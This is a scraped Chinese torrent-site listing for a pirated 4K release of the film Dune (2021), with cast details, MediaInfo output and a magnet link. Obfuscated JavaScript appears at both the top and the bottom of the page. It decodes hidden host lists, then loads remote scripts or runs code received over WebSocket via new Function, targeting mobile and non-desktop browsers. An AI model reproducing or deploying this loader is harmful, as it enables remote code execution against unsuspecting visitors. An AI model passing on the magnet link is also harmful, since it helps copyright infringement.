沙丘[中英特效字幕].Dune.2021.2160p.HDR.HMAX.WEB-DL.DDP5.1.Atmos.HEVC 20.33GB

B4dmin7 1月前 414

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 沙丘 / 沙丘瀚战(港)

◎片 名 Dune

◎年 代 2021

◎产 地 加拿大 / 匈牙利 / 美国

◎类 别 剧情 / 科幻 / 冒险

◎语 言 英语

◎上映日期 2021-10-22(美国/中国大陆) / 2021-09-03(威尼斯电影节) / 2021-09-11(多伦多电影节)

◎IMDb链接 https://www.imdb.com/title/tt1160419/

◎豆瓣评分 8.0/10 (6183人评价)

◎豆瓣链接 https://movie.douban.com/subject/3001114/

◎片 长 156分钟

◎导 演 丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

◎编 剧 丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

乔·斯派茨 Jon Spaihts (id:1320120)

艾瑞克·罗斯 Eric Roth (id:1000393)

弗兰克·赫伯特 Frank Herbert (id:1028181)

◎演 员 蒂莫西·柴勒梅德 Timothée Chalamet (id:1325862)

丽贝卡·弗格森 Rebecca Ferguson (id:1088314)

奥斯卡·伊萨克 Oscar Isaac (id:1012481)

戴夫·巴蒂斯塔 Dave Bautista (id:1014003)

赞达亚 Zendaya (id:1325576)

杰森·莫玛 Jason Momoa (id:1022614)

乔什·布洛林 Josh Brolin (id:1004568)

哈维尔·巴登 Javier Bardem (id:1054414)

斯特兰·斯卡斯加德 Stellan Skarsg?rd (id:1017918)

夏洛特·兰普林 Charlotte Rampling (id:1007020)

大卫·达斯马齐连 David Dastmalchian (id:1337583)

莎伦·邓肯-布鲁斯特 Sharon Duncan-Brewster (id:1192335)

斯蒂芬·亨德森 Stephen Henderson (id:1098483)

迈克尔·纳尔多内 Michael Nardone (id:1132642)

张震 Chen Chang (id:1077991)

巴布斯·奥卢桑莫昆 Babs Olusanmokun (id:1412919)

Oliver Ryan Oliver Ryan (id:1450193)

查理·罗尔斯 Charlie Rawes (id:1395007)

格洛里亚·奥比安约 Gloria Obianyo (id:1417321)

保罗·布林 Paul Bullion (id:1392807)

比约恩·弗赖贝格 Bj?rn Freiberg (id:1409305)

理查德·P·鲁宾斯坦 Richard P. Rubinstein (id:1019479)

凯文·J·安德森 Kevin J. Anderson (id:1054184)

丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

托马斯·图尔 Thomas Tull (id:1348364)

汉斯·季默 Hans Zimmer (id:1054386)

格雷格·弗莱瑟 Greig Fraser (id:1028361)

乔·沃克 Joe Walker (id:1336020)

帕特里斯·维梅特 Patrice Vermette (id:1299995)

汤姆·布朗 Tom Brown (id:1055694)

理查德·罗伯茨 Richard Roberts (id:1295779)

杰奎琳·韦斯特 Jacqueline West (id:1300754)

◎标 签 科幻 / 沙丘 / 美国 / 2021 / 奇幻 / 经典 / 冒险 / 剧情

◎简 介

电影《沙丘》为观众呈现了一段神秘而感人至深的英雄之旅。天赋异禀的少年保罗·厄崔迪被命运指引,为了保卫自己的家族和人民,决心前往浩瀚宇宙间最危险的星球,开启一场惊心动魄的冒险。与此同时,各路势力为了抢夺这颗星球上一种能够释放人类最大潜力的珍贵资源而纷纷加入战场。最终,唯有那些能够战胜内心恐惧的人才能生存下去。

◎获奖情况 (共2项)

第7届豆瓣电影年度榜单 (2020)

最值得期待的外语电影(提名)

第6届豆瓣电影年度榜单 (2019)

最值得期待的外语电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 166553951511871388477112462106040342947 (0x7D4D1FCF531D0B8099D12C94780E19A3)

  4. Complete name : [email protected]kv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 20.3 GiB

  8. Duration : 2 h 35 min

  9. Overall bit rate : 18.7 Mb/s

  10. Encoded date : UTC 2021-10-24 17:02:54

  11. Writing application : mkvmerge v20.0.0 ('I Am The Sun') 64-bit

  12. Writing library : libebml v1.3.5 + libmatroska v1.4.8


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. HDR format : SMPTE ST 2086, HDR10 compatible

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 35 min

  21. Bit rate : 17.9 Mb/s

  22. Width : 3 840 pixels

  23. Height : 2 160 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.090

  31. Stream size : 19.5 GiB (96%)

  32. Writing library : x265 3.4hy:[Linux][GCC 7.5.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=1 / wpp / no-pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x2160 / interlace=0 / total-frames=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=96 / keyint=96 / gop-lookahead=0 / bframes=3 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=4 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / rect / no-amp / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=3 / limit-refs=3 / limit-modes / me=3 / subme=3 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / no-weightb / no-analyze-src-pics / deblock=0:0 / sao / no-sao-non-deblock / rd=4 / selective-sao=4 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / no-b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=abr / bitrate=18000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=2 / cplxblur=20.0 / qblur=0.5 / vbv-maxrate=24500 / vbv-bufsize=24500 / vbv-init=0.6 / vbv-end=0.6 / vbv-end-fr-adj=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=1.00 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=0 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=787,239 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / no-concatenation / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Default : Yes

  35. Forced : No

  36. Color range : Limited

  37. Color primaries : BT.2020

  38. Transfer characteristics : PQ

  39. Matrix coefficients : BT.2020 non-constant

  40. Mastering display color primaries : Display P3

  41. Mastering display luminance : min: 0.0050 cd/m2, max: 4000 cd/m2

  42. Maximum Content Light Level : 787 cd/m2

  43. Maximum Frame-Average Light Level : 239 cd/m2


  44. Audio

  45. ID : 2

  46. Format : E-AC-3 JOC

  47. Format/Info : Enhanced AC-3 with Joint Object Coding

  48. Commercial name : Dolby Digital Plus with Dolby Atmos

  49. Codec ID : A_EAC3

  50. Duration : 2 h 35 min

  51. Bit rate mode : Constant

  52. Bit rate : 768 kb/s

  53. Channel(s) : 6 channels

  54. Channel layout : L R C LFE Ls Rs

  55. Sampling rate : 48.0 kHz

  56. Frame rate : 31.250 FPS (1536 SPF)

  57. Compression mode : Lossy

  58. Stream size : 854 MiB (4%)

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Text

  67. ID : 3

  68. Format : PGS

  69. Muxing mode : zlib

  70. Codec ID : S_HDMV/PGS

  71. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  72. Duration : 2 h 35 min

  73. Bit rate : 20.8 kb/s

  74. Count of elements : 3197

  75. Stream size : 23.1 MiB (0%)

  76. Title : 中英特效@KKYY

  77. Language : Chinese

  78. Default : Yes

  79. Forced : No




复制代码


TAGS 冒险 剧情 科幻

磁力链:
  • magnet:?xt=urn:btih:44DD6FD53DF64D69193DAAE3209F55751463C88F

上传的附件:
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};